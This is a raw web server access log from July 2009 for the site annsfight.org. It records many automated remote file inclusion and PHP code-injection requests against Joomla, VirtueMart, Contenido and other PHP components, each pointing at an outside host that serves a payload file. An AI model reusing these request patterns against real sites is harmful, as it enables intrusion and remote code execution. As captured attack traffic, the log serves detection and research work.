83.98.209.71 - - [05/Jul/2009:05:01:35 -0700] "GET /logs/access_090503.log//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:01:35 -0700] "GET /index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:01:35 -0700] "GET /logs//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:01:36 -0700] "GET /logs/access_090503.log//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:01:36 -0700] "GET /index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:01:36 -0700] "GET /logs//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:01:40 -0700] "GET /logs/access_090503.log//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:01:40 -0700] "GET /logs//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:01:40 -0700] "GET /index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:01:40 -0700] "GET /logs/access_090503.log%20%20//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:01:40 -0700] "GET /logs/access_090503.log%20%20//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:01:44 -0700] "GET /logs/access_090503.log//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:01:44 -0700] "GET /logs//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:01:44 -0700] "GET /index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:01:45 -0700] "GET /logs/access_090503.log%20%20//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:01:49 -0700] "GET /logs/access_090503.log%20%20//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:02:11 -0700] "GET /logs/access_090507.log%20%20//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:02:14 -0700] "GET /logs/access_090507.log%20%20//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:02:16 -0700] "GET /logs/access_090507.log%20%20//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:02:35 -0700] "GET /logs/access_090509.log//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:02:40 -0700] "GET /logs/access_090509.log//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:02:43 -0700] "GET /logs/access_090507.log%20%20//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:02:49 -0700] "GET /logs/access_090509.log//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
204.9.247.53 - - [05/Jul/2009:05:03:15 -0700] "GET /logs/access.log/?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
204.9.247.53 - - [05/Jul/2009:05:03:15 -0700] "GET /?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.annsfight.org"
204.9.247.53 - - [05/Jul/2009:05:03:16 -0700] "GET /logs/?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.annsfight.org"
83.98.209.71 - - [05/Jul/2009:05:03:18 -0700] "GET /logs/access_090509.log//index.php?option=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
89.171.190.110 - - [05/Jul/2009:05:04:07 -0700] "GET /logs/access_090509.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
80.237.155.83 - - [05/Jul/2009:05:04:40 -0700] "GET /logs/access_090415.log%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.annsfight.org"
80.237.155.83 - - [05/Jul/2009:05:04:40 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.annsfight.org"
80.237.155.83 - - [05/Jul/2009:05:04:40 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.annsfight.org"
211.245.23.158 - - [05/Jul/2009:05:05:58 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
211.245.23.158 - - [05/Jul/2009:05:05:58 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
211.245.23.158 - - [05/Jul/2009:05:05:58 -0700] "GET /logs/access_090415.log%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
121.124.127.34 - - [05/Jul/2009:05:06:08 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
121.124.127.34 - - [05/Jul/2009:05:06:08 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
121.124.127.34 - - [05/Jul/2009:05:06:08 -0700] "GET /logs/access_090415.log%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
211.245.23.158 - - [05/Jul/2009:05:08:54 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
211.245.23.158 - - [05/Jul/2009:05:08:54 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
211.245.23.158 - - [05/Jul/2009:05:08:55 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
211.245.23.158 - - [05/Jul/2009:05:10:01 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
211.245.23.158 - - [05/Jul/2009:05:10:01 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
211.245.23.158 - - [05/Jul/2009:05:10:01 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
121.124.127.34 - - [05/Jul/2009:05:10:38 -0700] "GET /logs/access_090415.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
94.229.66.202 - - [05/Jul/2009:05:10:52 -0700] "GET /logs/include/write.php?dir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.annsfight.org"
94.229.66.202 - - [05/Jul/2009:05:10:52 -0700] "GET /logs/access_090417.log/include/write.php?dir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.annsfight.org"
94.229.66.202 - - [05/Jul/2009:05:10:52 -0700] "GET /include/write.php?dir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.annsfight.org"
121.124.127.34 - - [05/Jul/2009:05:11:37 -0700] "GET /logs/access_090417.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
94.229.66.202 - - [05/Jul/2009:05:11:57 -0700] "GET /logs/access_090503.log/include/write.php?dir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.annsfight.org"
211.245.23.158 - - [05/Jul/2009:05:12:59 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
211.245.23.158 - - [05/Jul/2009:05:13:15 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
204.9.247.53 - - [05/Jul/2009:05:14:20 -0700] "GET /logs/access_090503.log//index.php?option=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
204.9.247.53 - - [05/Jul/2009:05:14:20 -0700] "GET /logs/access_090503.log//index.php?option=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
204.9.247.53 - - [05/Jul/2009:05:14:20 -0700] "GET /index.php?option=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
204.9.247.53 - - [05/Jul/2009:05:14:20 -0700] "GET /index.php?option=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
204.9.247.53 - - [05/Jul/2009:05:14:20 -0700] "GET /logs/access_090503.log//index.php?option=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
204.9.247.53 - - [05/Jul/2009:05:14:20 -0700] "GET /logs//index.php?option=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
204.9.247.53 - - [05/Jul/2009:05:14:20 -0700] "GET /logs//index.php?option=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
204.9.247.53 - - [05/Jul/2009:05:14:21 -0700] "GET /index.php?option=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
204.9.247.53 - - [05/Jul/2009:05:14:21 -0700] "GET /logs//index.php?option=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
211.245.23.158 - - [05/Jul/2009:05:15:43 -0700] "GET /logs/access_090421.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
211.245.23.158 - - [05/Jul/2009:05:15:58 -0700] "GET /logs/access_090421.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.roy-alflash.de/flash/fotos/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
211.230.156.161 - - [05/Jul/2009:05:16:13 -0700] "GET /logs/access.log%20%20/?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
211.230.156.161 - - [05/Jul/2009:05:16:13 -0700] "GET /?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.annsfight.org"
211.230.156.161 - - [05/Jul/2009:05:16:13 -0700] "GET /logs/?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.annsfight.org"
204.9.247.53 - - [05/Jul/2009:05:16:26 -0700] "GET /logs/access_090509.log//index.php?option=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
204.9.247.53 - - [05/Jul/2009:05:16:27 -0700] "GET /logs/access_090509.log//index.php?option=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
211.230.156.161 - - [05/Jul/2009:05:16:29 -0700] "GET /logs/access.log%20%20/?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
211.230.156.161 - - [05/Jul/2009:05:16:29 -0700] "GET /logs/?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.annsfight.org"
211.230.156.161 - - [05/Jul/2009:05:16:29 -0700] "GET /?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.annsfight.org"
70.85.213.106 - - [05/Jul/2009:05:19:29 -0700] "GET /phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
70.85.213.106 - - [05/Jul/2009:05:19:29 -0700] "GET /logs/access_090417.log%20%20/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
70.85.213.106 - - [05/Jul/2009:05:19:29 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
204.9.247.53 - - [05/Jul/2009:05:20:53 -0700] "GET /logs/access_090509.log//index.php?option=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
70.85.213.106 - - [05/Jul/2009:05:22:30 -0700] "GET /logs/access_090415.log%20%20/phphtml.php?htmlclass_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
218.158.98.196 - - [05/Jul/2009:05:22:47 -0700] "GET /logs/access_090417.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
218.158.98.196 - - [05/Jul/2009:05:22:48 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
218.158.98.196 - - [05/Jul/2009:05:22:49 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
218.158.98.196 - - [05/Jul/2009:05:23:25 -0700] "GET /logs/access_090509.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
211.230.156.161 - - [05/Jul/2009:05:35:21 -0700] "GET /logs/access.log/?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
211.230.156.161 - - [05/Jul/2009:05:35:31 -0700] "GET /logs/access.log/?sIncPath=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
59.125.5.1 - - [05/Jul/2009:05:35:35 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://tomato.pooding.com/lib/weblog/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.annsfight.org"
59.125.5.1 - - [05/Jul/2009:05:35:36 -0700] "GET /logs/access_090509.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://tomato.pooding.com/lib/weblog/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.annsfight.org"
59.125.5.1 - - [05/Jul/2009:05:35:36 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://tomato.pooding.com/lib/weblog/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.annsfight.org"
59.125.5.1 - - [05/Jul/2009:05:35:39 -0700] "GET /logs/access_090504.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://tomato.pooding.com/lib/weblog/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.annsfight.org"
59.125.5.1 - - [05/Jul/2009:05:40:26 -0700] "GET /logs/access_090429.log%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://tomato.pooding.com/lib/weblog/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.annsfight.org"
87.229.45.106 - - [05/Jul/2009:05:44:26 -0700] "GET /logs/access_090509.log//include/admin.lib.inc.php?site_path=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
87.229.45.106 - - [05/Jul/2009:05:44:26 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
87.229.45.106 - - [05/Jul/2009:05:44:26 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
87.229.45.106 - - [05/Jul/2009:05:45:45 -0700] "GET /logs/access_090417.log//include/admin.lib.inc.php?site_path=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
94.229.66.202 - - [05/Jul/2009:05:55:23 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.annsfight.org"
94.229.66.202 - - [05/Jul/2009:05:55:23 -0700] "GET /logs/access_090509.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.annsfight.org"
94.229.66.202 - - [05/Jul/2009:05:55:26 -0700] "GET /logs/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.annsfight.org"
94.229.66.202 - - [05/Jul/2009:05:56:24 -0700] "GET /logs/access_090429.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.annsfight.org"
87.229.45.106 - - [05/Jul/2009:06:02:17 -0700] "GET /logs/access_090417.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
87.229.45.106 - - [05/Jul/2009:06:02:17 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
87.229.45.106 - - [05/Jul/2009:06:02:17 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
87.229.45.106 - - [05/Jul/2009:06:04:46 -0700] "GET /logs/access_090507.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.annsfight.org"
87.229.45.106 - - [05/Jul/2009:06:06:51 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
87.229.45.106 - - [05/Jul/2009:06:06:51 -0700] "GET /logs/access_090503.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
87.229.45.106 - - [05/Jul/2009:06:06:51 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
87.229.45.106 - - [05/Jul/2009:06:08:36 -0700] "GET /logs/access_090417.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
216.117.128.143 - - [05/Jul/2009:06:12:41 -0700] "GET /?_zb_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.annsfight.org"
216.117.128.143 - - [05/Jul/2009:06:12:42 -0700] "GET /logs/access_090503.log//?_zb_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
216.117.128.143 - - [05/Jul/2009:06:12:42 -0700] "GET /logs//?_zb_path=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.annsfight.org"
69.65.41.165 - - [05/Jul/2009:06:17:55 -0700] "GET /http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.annsfight.org"
122.153.28.140 - - [05/Jul/2009:06:19:42 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
122.153.28.140 - - [05/Jul/2009:06:19:46 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
122.153.28.140 - - [05/Jul/2009:06:19:46 -0700] "GET /logs/access.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
122.153.28.140 - - [05/Jul/2009:06:19:46 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
122.153.28.140 - - [05/Jul/2009:06:19:46 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
122.153.28.140 - - [05/Jul/2009:06:19:46 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
72.10.166.250 - - [05/Jul/2009:06:21:28 -0700] "GET /logs/access_090427.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://highlandquebec.com/machap2008/templates/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
72.10.166.250 - - [05/Jul/2009:06:21:28 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://highlandquebec.com/machap2008/templates/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
72.10.166.250 - - [05/Jul/2009:06:21:28 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://highlandquebec.com/machap2008/templates/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.annsfight.org"
70.87.217.26 - - [05/Jul/2009:06:23:08 -0700] "GET /logs/access_090325.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
70.87.217.26 - - [05/Jul/2009:06:23:08 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hit168.com.cn/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.annsfight.org"
